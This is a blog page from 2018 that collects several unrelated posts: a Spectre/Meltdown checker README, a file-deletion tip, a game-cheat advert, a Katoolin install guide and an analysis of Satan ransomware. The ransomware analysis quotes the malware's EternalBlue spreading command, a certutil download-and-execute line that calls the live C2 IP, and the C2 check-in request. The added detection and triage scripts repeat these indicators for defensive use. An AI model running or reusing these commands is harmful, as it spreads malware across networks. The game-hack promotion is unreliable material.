Monday, 23 April 2018

Spectre & Meltdown checker for Linux


Spectre & Meltdown Checker
   A shell script to tell whether your system is vulnerable to the three "speculative execution" CVEs that were made public in early 2018.



   Supported operating systems:

    * Linux (all versions, flavors and distros)
    * BSD (FreeBSD, NetBSD, DragonFlyBSD)

   Supported architectures:
    * x86 (32 bits)
    * amd64/x86_64 (64 bits)
    * ARM and ARM64
    * other architectures will work, but mitigations (if they exist) might not always be detected

   For Linux systems, the script detects mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number and the distribution (Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, ...). It also works if you've compiled your own kernel.

   For BSD systems, detection works as long as the BSD you're using supports cpuctl and linprocfs (this is not the case for OpenBSD, for example).

Easy way to run the script
   Get the latest version of the script using curl or wget
      curl -L https://meltdown.ovh -o spectre-meltdown-checker.sh
      wget https://meltdown.ovh -O spectre-meltdown-checker.sh

   Inspect the script. You never blindly run scripts you downloaded from the Internet, do you?
      vim spectre-meltdown-checker.sh

   When you're ready, run the script as root
      chmod +x spectre-meltdown-checker.sh
      sudo ./spectre-meltdown-checker.sh


Example of script output
   Intel Haswell CPU running under Ubuntu 16.04 LTS



   AMD Ryzen running under OpenSUSE Tumbleweed

   Batch mode (JSON flavor)

Quick summary of the CVEs
   CVE-2017-5753 bounds check bypass (Spectre Variant 1)
    * Impact: Kernel & all software
    * Mitigation: recompile software and kernel with a modified compiler that introduces the LFENCE opcode at the proper positions in the resulting code
    * Performance impact of the mitigation: negligible

   CVE-2017-5715 branch target injection (Spectre Variant 2)
    * Impact: Kernel
    * Mitigation 1: new opcode via microcode update that should be used by up to date compilers to protect the BTB (by flushing indirect branch predictors)
    * Mitigation 2: introducing "retpoline" into compilers, and recompile software/OS with it
    * Performance impact of the mitigation: high for mitigation 1, medium for mitigation 2, depending on your CPU

   CVE-2017-5754 rogue data cache load (Meltdown)
    * Impact: Kernel
    * Mitigation: updated kernel (with PTI/KPTI patches), updating the kernel is enough
    * Performance impact of the mitigation: low to medium
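   The checker above inspects the kernel itself; since Linux 4.15 (and in distribution backports) the kernel also publishes its own per-CVE verdict as one file per vulnerability under /sys/devices/system/cpu/vulnerabilities, each holding a status line such as "Mitigation: PTI", "Vulnerable" or "Not affected". The following script is an added example written for this page, not part of spectre-meltdown-checker; it summarises that interface and exits non-zero when any entry is still vulnerable. The directory is a parameter so the functions can be exercised against a constructed sample, and the sample status lines are constructed for illustration, not captured from a real host.

```shell
#!/bin/sh
# Added example (not part of the checker): summarise what the Linux kernel
# itself reports under /sys/devices/system/cpu/vulnerabilities.
# The directory is a parameter so the functions can run on a constructed sample.

classify_status() {
    # Map one kernel status line to a coarse verdict.
    case "$1" in
        "Not affected"*) echo NOT_AFFECTED ;;
        Mitigation:*)    echo MITIGATED ;;
        Vulnerable*)     echo VULNERABLE ;;
        *)               echo UNKNOWN ;;
    esac
}

report_vulns() {
    # $1: sysfs-style directory (default: the live kernel interface).
    # Prints one line per entry; returns 1 if any entry is VULNERABLE,
    # 2 if the interface is missing (kernel too old), 0 otherwise.
    dir="${1:-/sys/devices/system/cpu/vulnerabilities}"
    if [ ! -d "$dir" ]; then
        echo "no sysfs vulnerability interface at $dir (kernel too old?)" >&2
        return 2
    fi
    rc=0
    for f in "$dir"/*; do
        name=$(basename "$f")
        line=$(cat "$f")
        status=$(classify_status "$line")
        printf '%-12s %-13s %s\n' "$name" "$status" "$line"
        if [ "$status" = VULNERABLE ]; then rc=1; fi
    done
    return "$rc"
}

make_sample() {
    # Constructed sample covering the three CVEs in this README; not a real host.
    d=$(mktemp -d)
    printf 'Mitigation: __user pointer sanitization\n' > "$d/spectre_v1"
    printf 'Vulnerable: Minimal generic ASM retpoline\n' > "$d/spectre_v2"
    printf 'Mitigation: PTI\n' > "$d/meltdown"
    echo "$d"
}

# Usage: ./vulnstatus.sh --live     -> read the live sysfs directory
#        ./vulnstatus.sh --sample   -> run against the constructed sample
#        ./vulnstatus.sh <dir>      -> run against any directory of status files
# With no argument only the functions are defined, so the file can be sourced.
case "${1:-}" in
    --sample) report_vulns "$(make_sample)" ;;
    --live)   report_vulns ;;
    "")       ;;
    *)        report_vulns "$1" ;;
esac
```

   The exit code makes the script usable from configuration-management or fleet checks: 1 means at least one CVE is reported unmitigated by the running kernel, 2 means the kernel predates the interface and the fuller checker above is needed.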

Disclaimer
   This tool does its best to determine whether your system is immune to (or has proper mitigations in place for) the collectively named "speculative execution" vulnerabilities. It doesn't attempt to run any kind of exploit, and can't guarantee that your system is secure; rather, it helps you verify whether your system has the known correct mitigations in place. However, some mitigations could also exist in your kernel that this script doesn't know (yet) how to detect, or it might falsely detect mitigations that in the end don't work as expected (for example, on backported or modified kernels).

   Your system's exposure also depends on your CPU. As of now, AMD and ARM processors are marked as immune to some or all of these vulnerabilities (except some specific ARM models). All Intel processors manufactured since circa 1995 are thought to be vulnerable, except some specific/old models, such as some early Atoms. Whatever processor one uses, one might seek more information from the manufacturer of that processor and/or of the device in which it runs.
   The nature of the discovered vulnerabilities being quite new, the landscape of vulnerable processors can be expected to change over time, which is why this script assumes that all CPUs are vulnerable unless the manufacturer has explicitly stated otherwise in a verifiable public announcement.
   Please also note that for the Spectre vulnerabilities, all software can possibly be exploited; this tool only verifies that the kernel (which is the core of the system) you're using has the proper protections in place. Verifying all the other software is out of the scope of this tool. As a general measure, ensure you always have the most up-to-date stable versions of all the software you use, especially those that are exposed to the world, such as network daemons and browsers.
   This tool has been released in the hope that it'll be useful, but don't use it to jump to conclusions about your security.


[WARHOX] HOW TO DELETE ANY FILE, FOLDER, GAME, etc.

DISCLAIMER: This Channel DOES NOT Promote or encourage Any illegal activities , all contents provided by This Channel is meant for EDUCATIONAL PURPOSE only . Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.


-------------------------------------------------------------
How to delete an undeletable file or folder:
1. Press Windows+R, type cmd and open the command prompt.
2. Right-click the file, open Properties and copy its location, then change to that directory: cd /d <location>
3. List the directory with its short (8.3) names: dir /x
4. Find the file name in the listing and remove it: rmdir /q /s <file name>
Now you can see that the file is deleted.
-------------------------------------------------------------

Sunday, 22 April 2018

8 Ball Pool v 3.13.4 Unlimited Force Mod By Game Killer

8 Ball Pool - UNLIMITED MONEY


👇FEATURES OF THIS HACK👇

(1) UNLIMITED MONEY

(2) UNLIMITED FORCE ON ALL CUE

(3) SEMI GUIDELINE MOD

(4) UPDATED VERSION

(5) GAME KILLER MOD ENABLE

(6) *NO ROOT*

(7) Etc...








To Learn How To Hack Any Games Subscribe Hack Now Channel


Install Kali Linux tools on Lubuntu/Ubuntu

Install Kali Linux tools on Lubuntu with Katoolin
1, Open LXTerminal (Lubuntu) or Terminal (Ubuntu). Update the package lists and install Git:
   sudo apt update && sudo apt install git
LXTerminal
2, Download and install Katoolin:
   git clone https://github.com/LionSec/katoolin && sudo cp katoolin/katoolin.py /usr/bin/katoolin
   sudo chmod +x /usr/bin/katoolin
   sudo katoolin

3, To install Kali Linux tools, add and update Kali Linux repositories:
   1 (Add Kali Linux repositories & Update) > 1 (Add Kali Linux repositories) and 2 (Update)

4, Install the classicmenu indicator:
   gohome > 3 (classismenu indicator) and y (Yes)

5, Next, install the Kali Linux menu to categorize the tools:
   gohome > 4 (Install Kali menu) and y (Yes)

6, Now, install all Kali Linux tools:
   gohome > 2 (View Categories) > 0 (All)

   Or install only the tools you want. For example, to install just SET (Social-Engineer Toolkit):
   gohome > 2 (View Categories) > 8 (Exploitation Tools) > 13 (SET)

7, Open new LXTerminal (Lubuntu) or Terminal (Ubuntu) window. To open SET, enter this command: sudo setoolkit

8, Layout of the Lubuntu menu after installing Kali Linux tools
Kali Linux menu on Lubuntu
Read more: Katoolin Install pentest tools from Kali Linux on GNU/Linux

Join the Telegram channel with me

Saturday, 21 April 2018

Satan ransomware adds EternalBlue exploit


Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.

Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.

In this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.


Analysis

First up is a file inconspicuously named "sts.exe", which may refer to "Satan spreader".


The file is packed with PECompact 2, and is therefore only 30 KB in size.

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:


Figure 1 - download and extract two new files

Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "RookIE/1.0", which seems a rather unique User-Agent.
  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". 

Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:

Figure 2 - UAC prompt

Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3 - End of setup screen

ms.exe (770ddc649b8784989eed4cee10e8aa04), on the other hand, will drop and load the EternalBlue exploit and start scanning for vulnerable hosts. The required files are dropped in the C:\ProgramData folder, as seen in Figure 3. Note that it uses a publicly available implementation of the exploit; it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 

We can then see an attempt to spread the ransomware to other machines in the same network:

Figure 4 - Spreading attempt over SMB, port 445

down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This plants sts.exe on other machines in the network, where it is then executed.

Satan ransomware itself, which is contained in Client.exe, will be dropped to C:\Cryptor.exe.

This payload is also packed with PECompact 2. As usual, any database-related services and processes are stopped and killed, so that files which would otherwise be locked by those processes can also be encrypted.

Figure 5 - Database-related processes

What's new in this version of Satan is that the exclusion list has changed slightly: it will not encrypt files with any of the following words in their path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware. (or vice-versa)

After encryption, Satan automatically opens the following ransom note, C:\_How_to_decrypt_files.txt:


Figure 6 - Ransom note


The note is, as usual, in English, Chinese and Korean, and demands that the victim pay 0.3 BTC. Satan prepends its email address, satan_pro@mail.ru, to filenames and appends the extension .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan

BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 
Email: satan_pro@mail.ru
Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan creates a unique mutex, SATANAPP, so the ransomware won't run twice. It also generates a unique hardware ID and sends it to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Connection: Keep-Alive
User-Agent: Winnet Client
Host: 198.55.107.149
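The network behaviour described in this post (the downloader's "RookIE/1.0" User-Agent, the certutil download that down64.dll triggers, and the "Winnet Client" check-in to /data/token.php on 198.55.107.149) can be turned into simple detection rules. The script below is an added example written for this page, not code from the original post or from the malware; it runs those rules over a handful of constructed proxy-log and process-creation lines. The log format is invented for the example, and the rule assumes the C2 "code" value is a hex string of at least 32 characters, since the post only shows it as a run of X placeholders.

```python
import re

# Added example: flag lines matching the Satan network indicators described in
# the post. The log format is constructed for this example; the indicator values
# (User-Agents, host, C2 path, certutil usage) are the ones the post reports.

C2_HOST = "198.55.107.149"

RULES = [
    ("satan-downloader-ua", re.compile(r'"RookIE/1\.0"')),
    # Assumption: the code parameter is a hex token of at least 32 characters.
    ("satan-c2-checkin", re.compile(r"GET /data/token\.php\?status=ST&code=[0-9A-Fa-f]{32,}")),
    ("satan-c2-ua", re.compile(r'"Winnet Client"')),
    ("satan-c2-host", re.compile(re.escape(C2_HOST))),
    # certutil fetching a remote file, as down64.dll does to plant sts.exe.
    ("certutil-remote-download",
     re.compile(r"certutil(\.exe)?\s+-urlcache\s+-split\s+-f\s+https?://", re.IGNORECASE)),
]


def scan_line(line):
    """Return the names of all rules that match one log line."""
    return [name for name, rx in RULES if rx.search(line)]


def scan_log(lines):
    """Return (line_number, rule_names) for every line with at least one hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        matched = scan_line(line)
        if matched:
            hits.append((n, matched))
    return hits


# Constructed sample: three proxy-log lines and two process-creation events.
# Line 2 is benign traffic; line 5 is a legitimate certutil use (hashing a file).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /cab/ms.exe HTTP/1.1" 200 "RookIE/1.0" 198.55.107.149',
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0" 93.184.216.34',
    'ProcessCreate cmd.exe /c certutil.exe -urlcache -split -f '
    'http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\\sts.exe',
    '10.0.0.5 - - "GET /data/token.php?status=ST&code=' + "a" * 64
    + ' HTTP/1.1" 200 "Winnet Client" 198.55.107.149',
    'ProcessCreate certutil.exe -hashfile C:\\setup.msi SHA256',
]

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

The certutil rule is the most durable of the five: the host and User-Agents change between campaigns, but `certutil -urlcache -split -f <url>` is a well-known download-and-execute idiom that rarely appears in legitimate process logs, so it is worth alerting on regardless of the destination.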

As mentioned at the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similarly to the one described here. It would fetch the following files:

2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.


Disinfection

You may want to verify whether any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession
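The disinfection checklist above, together with the renaming scheme described earlier ([satan_pro@mail.ru]<name>.satan), can be scripted as a host triage step. The following is an added example written for this page, not code from the original post: it checks for the listed artifact paths and walks a directory tree to find files renamed by Satan, recovering their original names from the pattern. The root directory is a parameter so the functions can be run against a constructed sample tree instead of a live C: drive; the sample tree itself is constructed for the example.

```python
import os
import re
import tempfile

# Added example: host triage for the artifacts listed in the post. Paths are
# relative to the drive root and written with backslashes as in the post;
# the encrypted-name pattern follows the post's example
# "[satan_pro@mail.ru]Desert.jpg.satan".

ARTIFACT_PATHS = [
    r"sts.exe",
    r"Cryptor.exe",
    r"ProgramData\ms.exe",
    r"ProgramData\client.exe",
    r"Windows\Temp\KSession",
]

ENCRYPTED_NAME = re.compile(r"^\[satan_pro@mail\.ru\](?P<orig>.+)\.satan$")


def find_artifacts(root):
    """Return the artifact paths (relative to root) that exist under root."""
    found = []
    for rel in ARTIFACT_PATHS:
        full = os.path.join(root, *rel.split("\\"))
        if os.path.exists(full):
            found.append(rel)
    return found


def original_name(filename):
    """Return the pre-encryption file name, or None if not in Satan's format."""
    m = ENCRYPTED_NAME.match(filename)
    return m.group("orig") if m else None


def find_encrypted_files(root):
    """Walk root and return (path, original_name) for every Satan-renamed file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            orig = original_name(fn)
            if orig is not None:
                hits.append((os.path.join(dirpath, fn), orig))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed sample: a fake drive with two artifacts and one encrypted file."""
    pictures = os.path.join(root, "Users", "bob", "Pictures")
    os.makedirs(os.path.join(root, "ProgramData"), exist_ok=True)
    os.makedirs(pictures, exist_ok=True)
    for rel in ("sts.exe", os.path.join("ProgramData", "ms.exe")):
        open(os.path.join(root, rel), "wb").close()
    open(os.path.join(pictures, "[satan_pro@mail.ru]Desert.jpg.satan"), "wb").close()
    open(os.path.join(pictures, "Beach.jpg"), "wb").close()


def run_sample():
    """Build the constructed tree in a temp dir and return what the checks find."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        artifacts = find_artifacts(tmp)
        encrypted = [orig for _path, orig in find_encrypted_files(tmp)]
    return artifacts, encrypted


if __name__ == "__main__":
    artifacts, encrypted = run_sample()
    print("artifacts present:", artifacts)
    print("encrypted files (original names):", encrypted)
```

On a real host you would call find_artifacts("C:\\") and find_encrypted_files on the user profile and share paths; a hit on any artifact path is a reason to isolate the machine before it attempts the SMB spreading described above.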

Prevention

  • Enable UAC
  • Enable Windows Update, and install updates (especially verify if MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)
More ransomware prevention can be found here.


Conclusion

Satan is not the first ransomware to use EternalBlue (WannaCry, for example, did so earlier); however, the developers of Satan do appear to be continuously improving and adding features to their ransomware.

Prevention is always better than disinfection/decryption.




IOCs